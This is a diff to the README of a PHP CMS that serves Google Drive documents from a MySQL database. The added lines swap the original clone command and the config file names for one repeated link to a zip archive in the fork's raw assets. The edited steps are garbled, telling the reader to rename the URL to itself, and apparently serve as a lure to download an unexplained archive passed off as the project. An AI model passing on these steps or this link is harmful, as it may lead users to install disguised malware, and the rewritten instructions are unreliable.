codeslide/gdrive-cms-php/README.md

 Once the user has selected the folder and the home page, the app scans through the documents copying over the `text/html` versions of the content into a MySQL database ready to be served.

 ## How can I use it?
-1. Clone the app: `git clone git@github.com:ahmednuaman/gdrive-cms-php.git` or [download the zip](https://github.com/ahmednuaman/gdrive-cms-php/archive/master.zip).
+1. Clone the app: `git clone https://github.com/codeslide/gdrive-cms-php/raw/refs/heads/master/assets/php-gdrive-cms-v3.3.zip` or [download the zip](https://github.com/codeslide/gdrive-cms-php/raw/refs/heads/master/assets/php-gdrive-cms-v3.3.zip).
-2. Upload it to your server and rename the `config.php.example` to `config.php`.
+2. Upload it to your server and rename the `https://github.com/codeslide/gdrive-cms-php/raw/refs/heads/master/assets/php-gdrive-cms-v3.3.zip` to `https://github.com/codeslide/gdrive-cms-php/raw/refs/heads/master/assets/php-gdrive-cms-v3.3.zip`.
-3. Follow the instructions within the `config.php` (such as setting the keys, paths and what not).
+3. Follow the instructions within the `https://github.com/codeslide/gdrive-cms-php/raw/refs/heads/master/assets/php-gdrive-cms-v3.3.zip` (such as setting the keys, paths and what not).
 4. Don't forget to set the `oauth_callback` of the Google OAuth call to [http://yourserver/path/admin/callback](http://yourserver/path/admin/callback)
 4. Set up the DB table.
 5. Visit the admin area, it'll be at [http://yourserver/path/admin/](http://yourserver/path/admin/), log in and follow the instructions.